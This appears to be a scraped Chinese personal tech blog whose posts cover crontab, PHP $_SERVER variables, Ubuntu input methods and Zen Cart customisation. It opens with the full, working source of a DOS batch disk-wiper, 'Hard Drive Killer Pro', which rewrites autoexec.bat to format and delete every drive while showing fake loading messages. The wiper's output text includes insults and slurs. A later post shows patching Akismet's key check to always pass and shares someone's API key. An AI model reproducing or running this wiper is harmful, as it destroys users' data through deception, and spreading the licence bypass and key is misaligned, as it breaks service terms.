rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don’t worry about how it
rem works, it’s d\*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.

echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find “Vol” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it’s true.
rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find “bytes” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive – not ready.
rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:.\/ad/w/-p $b find ” 0 bytes free” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it’s errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it’s not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. “enddc” stands for “end dDRIVE cHECKING”.

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c

:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bunga’s Multiple Hard Drive Killer version 4.0.

>>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to

tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted.

>>c:\autoexec.bat
echo echo 2. Love is important, if you have it, truly, don’t let go of it like I did!

>>c:\autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I’m glad your HD is

dead. >>c:\autoexec.bat
echo echo 4. Don’t support the following: War, Racism, Drugs and the Liberal

Party.>>c:\autoexec.bat

echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat

:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in (“if not exist %%2\nul md %%2″ “if exist %%2\nul cd %%2″) do %%%%a

>>c:\temp.bat
echo for %%%%a in (“>ass_hole.txt”) do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%

%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto

startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul

cls
echo Initializing Variables . . .
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for

further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What’s the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don’t you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga

:end

rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
rem Author: Munga Bunga – from Australia, the land full of retarded Australian’s (help me get

out of here).

crontab 详解

admin — Fri, 08 May 2009 15:37:18 +0000

名称 : crontab

使用权限 : 所有使用者

使用方式 :

crontab [ -u user ] file
crontab [ -u user ] { -l | -r | -e }

说明 :
crontab 是用来让使用者在固定时间或固定间隔执行程序之用，换句话说，也就是类似使用者的时程表。

-u user 是指设定指定 user 的时程表，这个前提是你必须要有其权限(比如说是 root)才能够指定他人

的时程表。如果不使用 -u user 的话，就是表示设定自己的时程表。

餐数 :

-e : 执行文字编辑器来设定时程表，内定的文字编辑器是 VI，如果你想用别的文字编辑器，则请先设定

VISUAL 环境变数来指定使用那个文字编辑器(比如说 setenv VISUAL joe)
-r : 删除目前的时程表
-l : 列出目前的时程表

时程表的格式如下 :
f1 f2 f3 f4 f5 program

其中 f1 是表示分钟，f2 表示小时，f3 表示一个月份中的第几日，f4 表示月份，f5 表示一个星期中的

第几天。program 表示要执行的程序。
当 f1 为 * 时表示每分钟都要执行 program，f2 为 * 时表示每小时都要执行程序，其馀类推
当 f1 为 a-b 时表示从第 a 分钟到第 b 分钟这段时间内要执行，f2 为 a-b 时表示从第 a 到第 b 小

时都要执行，其馀类推
当 f1 为 */n 时表示每 n 分钟个时间间隔执行一次，f2 为 */n 表示每 n 小时个时间间隔执行一次，

其馀类推
当 f1 为 a, b, c,… 时表示第 a, b, c,… 分钟要执行，f2 为 a, b, c,… 时表示第 a, b, c…

个小时要执行，其馀类推

使用者也可以将所有的设定先存放在档案 file 中，用 crontab file 的方式来设定时程表。
例子 :

每月每天每小时的第 0 分钟执行一次 /bin/ls :
0 7 * * * /bin/ls

在 12 月内, 每天的早上 6 点到 12 点中，每隔 20 分钟执行一次 /usr/bin/backup :
0 6-12/3 * 12 * /usr/bin/backup

周一到周五每天下午 5:00 寄一封信给 alex@domain.name :
0 17 * * 1-5 mail -s “hi” alex@domain.name < /tmp/maildata

每月每天的午夜 0 点 20 分, 2 点 20 分, 4 点 20 分….执行 echo “haha”
20 0-23/2 * * * echo “haha”

注意 :

当程序在你所指定的时间执行后，系统会寄一封信给你，显示该程序执行的内容，若是你不希望收到这样

的信，请在每一行空一格之后加上 > /dev/null 2>&1 即可
名称 : crontab

使用权限 : 所有使用者

使用方式 :

crontab [ -u user ] file
crontab [ -u user ] { -l | -r | -e }

说明 :
crontab 是用来让使用者在固定时间或固定间隔执行程序之用，换句话说，也就是类似使用者的时程表。

-u user 是指设定指定 user 的时程表，这个前提是你必须要有其权限(比如说是 root)才能够指定他人

的时程表。如果不使用 -u user 的话，就是表示设定自己的时程表。

预定义变量之服务器变量：$_SERVER

admin — Mon, 04 May 2009 05:52:13 +0000

预定义变量
服务器变量：$_SERVER
注: 在 PHP 4.1.0 及以后版本使用。之前的版本，使用 $HTTP_SERVER_VARS。

$_SERVER 是一个包含诸如头部(headers)、路径(paths)和脚本位置(script locations)的数组。数组的实体由 web 服务器创建。不能保证所有的服务器都能产生所有的信息；服务器可能忽略了一些信息，或者产生了一些未在下面列出的新的信息。这意味着，大量的这些变量在 CGI 1.1 specification 中说明，所以您应该仔细研究它。

这是一个“superglobal”，或者可以描述为自动全局变量。这只不过意味这它在所有的脚本中都有效。在函数或方法中您不需要使用 global $_SERVER; 访问它，就如同使用 $HTTP_SERVER_VARS 一样。

$HTTP_SERVER_VARS 包含着同样的信息，但是不是一个自动全局变量。（注意： $HTTP_SERVER_VARS 和 $_SERVER 是不同的变量，PHP 处理它们的方式不同。）

如果设置了 register_globals 指令，这些变量也在所有脚本中可用；也就是，分离了 $_SERVER 和 $HTTP_SERVER_VARS 数组。相关信息，请参阅安全的相关章节使用 Register Globals。这些单独的全局变量不是自动全局变量。

您或许会发现下面列出的某些 $_SERVER 元素并不可用。注意，如果以命令行方式运行 PHP，下面列出的元素几乎没有有效的（或是没有任何实际意义的）。

“PHP_SELF”
当前正在执行脚本的文件名，与 document root相关。举例来说，在URL地址为 http://example.com/test.php/foo.bar 的脚本中使用 $_SERVER['PHP_SELF'] 将会得到 /test.php/foo.bar 这个结果。

如果 PHP 以命令行方式运行，该变量无效。

“argv”
传递给该脚本的参数。当脚本运行在命令行方式时，argv 变量传递给程序 C 语言样式的命令行参数。当调用 GET 方法时，该变量包含请求的数据。

“argc”
包含传递给程序的命令行参数的个数（如果运行在命令行模式）。

“GATEWAY_INTERFACE”
服务器使用的 CGI 规范的版本。例如，“CGI/1.1”。

‘SERVER_NAME’
当前运行脚本所在服务器主机的名称。如果该脚本运行在一个虚拟主机上，该名称是由那个虚拟主机所设置的值决定。

‘SERVER_SOFTWARE’
服务器标识的字串，在响应请求时的头部中给出。

“SERVER_PROTOCOL”
请求页面时通信协议的名称和版本。例如，“HTTP/1.0”。

“REQUEST_METHOD”
访问页面时的请求方法。例如：“GET”、“HEAD”，“POST”，“PUT”。

“QUERY_STRING”
查询(query)的字符串。

“DOCUMENT_ROOT”
当前运行脚本所在的文档根目录。在服务器配置文件中定义。

“HTTP_ACCEPT”
当前请求的 Accept: 头部的内容。

“HTTP_ACCEPT_CHARSET”
当前请求的 Accept-Charset: 头部的内容。例如：“iso-8859-1,*,utf-8”。

“HTTP_ACCEPT_ENCODING”
当前请求的 Accept-Encoding: 头部的内容。例如：“gzip”。

“HTTP_ACCEPT_LANGUAGE”
当前请求的 Accept-Language: 头部的内容。例如：“en”。

“HTTP_CONNECTION”
当前请求的 Connection: 头部的内容。例如：“Keep-Alive”。

“HTTP_HOST”
当前请求的 Host: 头部的内容。

“HTTP_REFERER”
链接到当前页面的前一页面的 URL 地址。不是所有的用户代理（浏览器）都会设置这个变量，而且有的还可以手工修改 HTTP_REFERER。因此，这个变量不总是正确真实的。

“HTTP_USER_AGENT”
当前请求的 User_Agent: 头部的内容。该字符串表明了访问该页面的用户代理的信息。一个典型的例子是：Mozilla/4.5 [en] (X11; U; Linux 2.2.9 i586)。您也可以使用 get_browser() 得到这个信息。

“REMOTE_ADDR”
正在浏览当前页面用户的 IP 地址。

“REMOTE_PORT”
用户连接到服务器时所使用的端口。

“SCRIPT_FILENAME”
当前执行脚本的绝对路径名。

“SERVER_ADMIN”
该值指明了 Apache 服务器配置文件中的 SERVER_ADMIN 参数。如果脚本运行在一个虚拟主机上，则该值是那个虚拟主机的值。

“SERVER_PORT”
服务器所使用的端口。默认为“80”。如果你使用 SSL 安全连接，则这个值为您所设置的 HTTP 端口。

“SERVER_SIGNATURE”
包含服务器版本和虚拟主机名的字符串。

“PATH_TRANSLATED”
当前脚本所在文件系统（不是文档根目录）的基本路径。这是在服务器进行虚拟到真实路径的映像后的结果。

“SCRIPT_NAME”
包含当前脚本的路径。这在页面需要指向自己时非常有用。

“REQUEST_URI”
访问此页面所需的 URI。例如，“/index.html”。

“PHP_AUTH_USER”
当 PHP 运行在 Apache 模块方式下，并且正在使用 HTTP 认证功能，这个变量便是用户输入的用户名。

“PHP_AUTH_PW”
当 PHP 运行在 Apache 模块方式下，并且正在使用 HTTP 认证功能，这个变量便是用户输入的密码。

“PHP_AUTH_TYPE”
当 PHP 运行在 Apache 模块方式下，并且正在使用 HTTP 认证功能，这个变量便是认证的类型。

解决与明白HP541笔记本电脑不能ghost的问题。

admin — Thu, 30 Apr 2009 02:27:22 +0000

昨天，公司用的装了雨林木风的XP系统HP541笔记本电脑中毒了，无法正常关机与重启，那只好考虑重装，打算装深度XP，但无论怎样试，在DOS就是不能GHOST。进到PE，反而可以运行GHOST来装XP，也就是不能在DOS状态下安装XP。。。很奇怪。上网搜了搜，发现也有购买HP541笔记本电脑的用户也遇到跟俺一样的问题。初步判断是可能HP541笔记本电脑的问题。。。

下面为上网搜索到的内容：

P 541 不能GHOST，为何 [已解决]

　　最近购买HP 541 笔记本，无论是U盘、光盘启动，均不能运行GHOST，在DOS下一运行GHOST就死机，但在PE或XP下可以正常运行GHOST32中，不知什么原因，请高手帮忙。

在config.sys中加载UMBPCI或EMM386，成功运行GHOST。另外，用xmsdsk虚拟内存盘出错的，也不妨试试，有可能会在DOS下用xmsdsk成功虚拟内存盘（若不成功，删除MSDOS.SYS后再试）。但是，加载后用xmsdsk虚拟内存盘有待高手进一步研究，如何提高成功率。

询问HP工程师，答复是与GHOST不兼容，目前还无法解决。试过TIDOS、PQDI，可以运行，但速度不如GHOST，也没有GHOST普遍，感觉不如GHOST顺手。

ubuntu9.04下安装IBUS中文输入法

admin — Sun, 26 Apr 2009 14:54:41 +0000

昨天，利用星期日休息时间，就想着将手提电脑里的ubuntu8.10升级到4.23后出来的ubuntu9.04，用家里的ADSL MODEM，经过差不多整天的升级。终于升级成功。但升级完成后，发觉IBUS不能用，俺平时用开五笔。没五笔输入，感觉上网，聊天，写博，全都不方便，那没办法，只能是重新安装ibus.俺之前在8.10安装过ibus,也在本博记下安装过程，但俺难得在本博搜索。就直接在GOOGLE里搜索。就搜到下面的参考文档，用了一下，发觉没错误，就直接复制到本博客啦。

1、scim输入法和字体（不是我和scim过不去，是ibus和scim过不去啊）
sudo aptitude purge ~nscim
sudo aptitude install language-support-fonts-zh

2、然后检查源的配置：

sudo gedit /etc/apt/sources.list

3、在软件源中添加：

deb http://ppa.launchpad.net/ibus-dev/ppa/ubuntu jaunty main

4、在命令行安装：

sudo apt-get update
sudo apt-get install ibus-pinyin

sudo apt-get install ibus ibus-pinyin ibus-table

5、如果是第一次安装iBus，那么需要设置一下系统的默认输入法：

sudo im-switch -c

6、重启电脑

7、在系统提示栏的iBus图标上单击右键，选择“首选项->输入法”，添加拼音输入法和其它所需的输入法。

下面这篇也是参考网上，是安装IBUS五笔的。觉得也有一定的参考作用。就顺便也拿过来啦。
IBUS是不错的输入法，目前正在使用中。至少在firefox和opera中国版中还没发现问题。

，自己总结了一下我在ubuntu9.04下ibus五笔的安装方法：

1.加PPA源，先导入ibus的pgpkey（不导入key 每次安装都会有安全警示）
代码:
sudo apt-key adv –recv-keys –keyserver keyserver.ubuntu.com 72dbf294b86c9beb7170023321c022aa985e0e11

然后在软件源中添加
代码:
deb http://ppa.launchpad.net/ibus-dev/ppa/ubuntu jaunty main

关闭时更新软件源
2.安装五笔码表及gtk,qt支持
代码:
sudo apt-get install ibus-table-wubi ibus-gtk ibus-qt4

3. 如果是第一次安装iBus，那么需要设置一下系统的默认输入法：
sudo im-switch -c
4. 注销
5. 在系统提示栏的iBus图标上单击右键，选择“首选项->输入法”，添加五笔输入法。

快捷键：
左shift：中英文切换
右shift：拼音反查，一次只能查一个字，输入拼音后出字时直接按对应数字是输入，按Ctrl+数字反查
ctrl+,：切换单字模式
ctrl+.：切换中英文标点
ctrl+/：切换直接提交模式
ctrl+’：显示输入统计

另外关于光标自动跟随应该是ibus-gtk和ibut-qt4两个包在起作用。

从网上找到的可用的。wordpress api-keys

admin — Sun, 26 Apr 2009 14:08:13 +0000

这段时间，发觉博客的垃圾评论越来越多，没办法下，只好正视这个问题，从网上了解到，wordpress自带 akismet插件来防垃圾评论，但wordpress的过渡垃圾留言插件akismet,需要wordpress api key才能激活,wordpress api key需要去wordpress.com注册,然后登录在个人档案中找.但wordpress.com被GFW封锁,国内无法访问,

虽然可以通过代理访问但麻烦.这里有更容易的方法,绕过wordpress api key激活akismet插件.

修改akismet.php里这一行function akismet_verify_key( $key )用//注释掉{…}里面的全部内容，写上一个return true;即可，让校验函数直接返回验证通过。
或者用以下代码替换:
function akismet_verify_key( $key ) {
return true;
}

以上这种方法，俺是从网上搜到的。但试过后，发觉不能用。可能是俺的RP不行吧。所以，也没细究。随后，就在网上找了一个可用的wordpress api key 就是下面这个。
发一个wordpress api key，可用于akismet

key：0981454d222c

但是用了akismet后，效果好像还是不太好，虽然可发防止垃圾邮件不在前台显示，但在后台，还是显示有越来多的垃圾评论。。。看来要想其它办法来解决。

收集的zencart 相关文档,方便读懂zencart源代码

admin — Sat, 25 Apr 2009 01:27:12 +0000

众所周知，Zen cart是最好的网店程序之一，而且国内用户是越来越多，但与生俱来的一些程序问题干扰了站内搜索引擎优化，再很多使用方面也存在难以上手的问题。现在我们可以通过插件的应用及2次开发来达到我们更好的通过搜索引擎销售产品的目的。
1>测试首页、频道页、内页的meta属性(主要包括标题、描述与关键词),根据页面匹配性,将关键词有效的布局在每个页面内,最好可以达到自由编写的水平。
2>正确书写robots.txt和站内nofollow属性，屏蔽部分与页面优化冲突或者不应被搜索引擎抓捕的目录和页面。
3>保证多种语言版本网站内容的收录和索引
4> 针对性强的页面静态化并使其具有良好的结构（注意控制路径长度）：以产品和产品目录页面为核心，构建核心明确、相关度高的站内结构;产业页面内容唯一、不与其他页面重复;站内导入链接无误，由于更新等原因失效的错误页面使用404.htm；重要的产品及目录页面在网站大型调整后要保证url不变，已做变化的需要将原路径301永久重定向到新页面；首页确定主域名后，其他域名301定向到主域名。
5>适合中英文等不同语言包的优化插件。
6>生成sitemap或rss feed并提交。
解决方法:安装优化插件
Yahoo! Product Submit Feeder
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=841
用于提交网站产品到雅虎搜索引擎在线营销商务数据库（具体介绍见

http://searchmarketing.yahoo.com/shopsb/shpsb_specs.php）

Ultimate SEO URLs
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=231
用于站内相关页面地址静态化
Tabbed Products Pro
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=924
用于优化分类及产品页面Meta等标签
Swap Images via MouseOver or Click
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=311
用于提高产品展示的用户体验，简化浏览过程
Simple SEO URL
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=1013
用于转换页面路径形式，以频道形式优化url
EZ pages rel=nofollow attribute
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=944
用于更好的控制页面抓取和索引
css-buttons
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=272
优化模板图片，提高页面浏览速度
Bidhopper Dynalist Generator
下载：http://www.zen-cart.com/index.php?main_page=product_contrib_info&products_id=840
用于提交产品到bidhopper.com（一个基于美国用户的分类产品及相关价格的商业搜索引擎）
Live help 1.2
下载：http://www.zen-cart.cn/forum/topic4466.html
更多seo及用户体验插件详见：

http://www.zen-cart.com/index.php?main_page=index&cPath=40&zenid=fa8f24307bfa5e0824e7da03812d9e50

商业插件：

http://www.magic-seo-url.com/zencart/

介绍见：http://www.magic-seo-url.com/zencart/features.html

经过以上的调整，我们可以使基于Zen Cart程序的站点达到以下水平：
1>保证站内有效页面在各个搜索引擎的索引数量。
2>通过在线统计系统或者分析logfiles得到产品的销售规律。
3>追踪排名变化，根据竞争对手的情况有效调整推广方案。
4>排除重复或类容页面对站点各关键词排名的影响，有效提高页面pr。
5>在流量及排名的稳定的情况下，分析网站用户体验（比如搜索、联系方式、交易方式等）对客户转化率的影响，适时调整。
6>对站外优化提出最大工作量的细节要求，定期定量的完成链接打造等指标。
相关文章
zencart文件上传安全隐患
zencart的cache和images两个目录由于需要保存sessions和图像, 设置了777的完全权限.
但默认的zencart在两个目录都没有设置.htaccess的安全执行机制. 有可能(已经出现有了)被上传黑客程序.
必须在cache和images两个目录里的.htaccess文件里增加以下代码, 防止php程序在这两个目录里执行.

[Files *.php]
Order Deny,Allow
Deny from all
[/Files]

没有.htaccess就新建该文件

我们在对国外的客户销售产品或服务的时候，需要接受国外客户的付款。而国外客户最方便和最常用的方式就是信用卡付款。
但是，如果是直接接受信用卡付款，拿着客户的信用卡号码去银行要钱，对于大部分的普通商家，还是不可行的。
那么中小型商家怎么在自己的网站上接受国外客户的信用卡付款呢？
根据HosteGuide.com的整理，目前一共有3种可行的方法：

1，通过paypal收款，paypal提供了2中收款模式，一种是对方有paypal帐号，通过paypal帐号付款给商家；一种是可以不用注册paypal帐号，直接用信用卡付款。一般常用的visa master jbc等都支持。
这种方式一般没有月服务费和开户费，每笔交易收取手续费3.4%，这是成本最低的接受国外付款的方式。
2，通过国内支付网关的外海版，如 chinabank 和ips都有这样的平台
这种一般需要企业法人申请，各家的政策不同，可以去咨询。
3，通过国外的支付网关，如2checkout等，他们是类似于国内的chinabank和ips这样的第三方支付网关。有月租费和每笔手续费。他们的好处是：相对与ips，国外的客户比较相信这些国际的支付网关。
很多开源的商城系统，都已经包含了这些模块，去申请开户就可以了。（如 zen-cart oscommerce等）

本文所用版本：1.3.8a
ZenCart商品分类可以无限分级，所有分类页面和所有商品页面的title、description、keywords可以自由编辑，特别是商品页面的title有多个自动填充选项，在这一点上对SEO的考虑可以说到了极致。
一，自由编辑商品页面的title、description、keywords。
进入后台，在商品管理–〉商品分类里新建分类和商品后，在商品列表的最右边可以看到类似风轮的图标，黑的为Meta标签未定义，红的为Meta标签已定义，默认为黑色。
很多人用ZenCart建站后，从来没有点击这个风轮，风轮永远是黑色，没有充分利用ZenCart提供的最重要的SEO手段。
黑色意味着页面的title、description、keywords为系统自动生成的。
title为：
商品名称+[商品编号]+PRIMARY_SECTION+TITLE+TERTIARY_SECTION+SITE_TAGLINE
description为：
TITLE+商品名称+[商品编号]+SECONDARY_SECTION+商品简介
keywords为：
商品名称+[商品编号]+所有一级商品分类的名称
注意上面的PRIMARY_SECTION、TITLE、TERTIARY_SECTION、SITE_TAGLINE、SECONDARY_SECTION可以在meta_tags.php文件里自由设定。
问题很明显：title关键词覆盖面窄，description太长，keywords里所有一级商品分类的名称是很离谱的。
然而ZenCart作为国际顶级的网店系统，提供了神奇的风轮。
光点击进风轮是不变红的，必须在随后出现的页面的当前语言的title、description、keywords编辑栏里输入东西才变红，唯有如此，系统才会放弃自动生成的title、description、keywords，而采用人工输入的title、description、 keywords，实现自由编辑。
Ethan非常赞赏的地方是对于最重要的title，ZenCart提供了自动填充的功能，此举应该成为网店系统效仿的榜样。自动填充可以设定是否呈现商品名称、标题、商品编号、价格、标题/标签行，生成title的公式如下：
商品名称+标题+[商品编号]+SECONDARY_SECTION+价格+PRIMARY_SECTION+TITLE+TERTIARY_SECTION+SITE_TAGLINE
注意上面的PRIMARY_SECTION、TITLE、TERTIARY_SECTION、SITE_TAGLINE、 SECONDARY_SECTION可以在meta_tags.php文件里自由设定，标题为下面编辑框里输入的title，标题/标签行就是TITLE /SITE_TAGLINE。
二，自由编辑分类页面的title、description、keywords。
和自由编辑商品页面类似，不过没有自动填充的功能。
Zen Cart文件替代机制
这才是zen cart超强的一个功能啊！
很多用户对zen cart做了自己的修改，非常好！但同时，一些用户修改了很多重要的文件，例如：
/includes/filenames.php
/includes/languages/schinese.php
/includes/languages/schinese/*.php
等等…
友情提示：如果你希望以后的升级更容易，不要修改这些文件！
Zen Cart的文件替代机制的功能非常强，你不需要修改上面的这些文件。
如果你修改了这些文件，下次升级的时候，Zen Cart会覆盖这些文件，你做的修改会丢失。
好了，如何避免这种情况呢？如何使用文件替代机制？
下面，我一步步说明如何使用文件替代机制，而不是去修改Zen Cart的核心文件！
下面的所有例子，都假设你：
1. 使用简体中文。其它语言相应修改就好。
2. 例子使用的模板名字是custom
“custom” 目录名可以是任何名字…. 只是在所有地方都要一致，这样文件替代机制才能正常工作。
你可以命名为:
- mytemplate
- custom
- billg
- helluvacart
- zenrocks
- thisseemstoolongatemplatename
- supercalifragilisticexpialidocious
- tpl
还有很多 !!!!

附录及声明: 如果我漏了什么, 或者说错了，请告知，我会尽快修改! 不作任何担保。一个月后凭收据退款!
— 注，请先阅读－如何添加、制作新模板？
——————————————————————————–
修改缺省语言文件 – /includes/languages/schinese.php
例子: 你想修改标题，将“Zen Cart!”, 改为“我的商店名称！”
在目录/includes/languages下，建立一个与你的模板同名的目录，例如/includes/languages/custom.
将schinese.php文件复制到该目录。
接着，你就可以修改文件/includes/languages/custom/schinese.php:
define(’TITLE’, ’Zen Cart!’);
改为:
define(’TITLE’, ’我的商店名称!’);
——————————————————————————–
修改语言文件 – /includes/languages/schinese/*.php (所有该目录下的文件)
例子: 你想修改account.php中的文字 – 比如你要将 ’帐号’ 改为 ’档案’
建立一个与你的模板同名的目录。假设模板名是custom。那么目录就是:
/includes/languages/schinese/custom
将原来的文件/includes/languages/schinese/account.php复制到新目录:
/includes/languages/schinese/custom
接着, 修改该新的custom目录下的文件。这样，该修改会 ’替代’ 原来/includes/languages/schinese目录中的相应文件, 从而不会影响和修改核心文件。
——————————————————————————–
修改模板文件 – /includes/templates/template_default/templates/tpl_*_default.php
例如: 你想修改tpl_account_default.php文件中的一些HTML
在你的模板目录中( /includes/templates/custom ) 你应该已经有一个模板目录了 ( /includes/templates/custom/templates )。
将文件tpl_account_default.php复制到该目录中。然后你就可以自己修改了，它会自动 ’替代’ /includes/templates/template_default/templates目录中的相应文件。
你只要复制需要修改的文件到自己的模板目录，如果你未做修改，那么缺省情况下，商店会从template_default目录调用缺省文件。
——————————————————————————–
修改边框模板
这和修改通用模板是一样的(见上), 除了边框的路径是:
/includes/templates/custom/sideboxes
——————————————————————————–
修改边框 – /includes/modules/sideboxes/*.php
例子: 你想修改边框information.php文件，加上另外一个链接。
在边框文件的目录中(/includes/modules/sideboxes)，建立另一个和模板custom同名的子目录，就是/includes/modules/sideboxes/custom
将文件information.php复制到该新目录中
接着你就可以修改新的information.php，它会替代/includes/modules/sideboxes目录中的缺省information.php文件
你可以核对该边框是否被替代，登录管理页面 -> 工具 -> 外观控制。在栏目 ’方框文件名’ 下, 如果文件名显示为红色, 就说明它被替代了。
——————————————————————————–
调用自定义文件名 – /includes/filenames.php
例子: 你新建了一个页面about_us，需要调用该文件名。
不要在/includes/filenames.php文件中添加一个新的定义，你应该在已有的目录/includes/extra_datafiles中定义该文件名。
建立新文件about_us_filenames.php，然后放在目录/includes/extra_datafiles中。
在该文件中，要有以下代码:
// About Us Filename Define
##define(’FILENAME_ABOUT_US’, ’about_us’);
?>
该文件将自动被调用, 就象该目录中的其它文件一样, 因此系统知道你的定制文件。
尽量用同样的办法新建文件…例如, 调用文件blah，将它命名为blah_filenames.php
——————————————————————————–
调用自定义数据库表 – /includes/database_tables.php
例子: 你为自己的UPS跟踪系统建了个数据库ups_track，需要为代码定义数据表名。
不要在文件/includes/database_tables.php中定义, 你要在已有的目录/includes/extra_datafiles中定义数据表。
建立新文件ups_track_database_tables.php，置于目录/includes/extra_datafiles中。
在该文件中，要有以下代码:
// UPS Tracking Table
##define(’TABLE_UPS_TRACK’, ’ups_track’);
?>
该文件将自动被调用，就象该目录中的其它文件一样, 因此系统知道你的定制数据库。
——————————————————————————–
额外语言文件
例如: 你新建了一个Resource Center方框，需要一个额外文件来调用额外语言定义。
在目录/includes/languages/schinese/extra_definitions中, 你可以建立一个文件resource_center_box_defines.php。在该文件中，你可以放置新的方框的所有语言定义。
该文件将自动被调用, 保证你的自定义方框或页面的语言定义被调用。
——————————————————————————–
给已有文件增加额外Javascript
例子: 你想为你的Bizrate帐号调用一些javascript，这样，订单完成后，就会从已有页面调用checkout_success.php。
在目录/includes/modules/pages/checkout_success中，建一个新文件jscript_bizrate.js
在该文件中，放置Bizrate给你的javascript代码，例如:

同样地..如果你使用Google的转换跟踪系统。建立另外一个文件，例如jscript_google.php
——————————————————————————–
添加和修改CSS文件
例子: 你为自己的网站新建了一个CSS类
不要添加到已有的CSS文件/includes/templates/custom/css/stylesheet.css中，要在同一目录下，另建一个文件stylesheet_YOURFILENAME.css，然后将你的CSS数据加在这里。
——————————————————————————–
最后，谈谈升级！
现在，你正确使用Zen Cart的替代机制了！恭喜，你可以放心了。你不用担心升级文件会覆盖你的定制文件，因为所有的定制文件都保存在你自己的目录里！
好吧，你升级了Zen Cart。但如果你替代的文件有新的代码呢？所以你需要比较custom目录和新的核心文件。
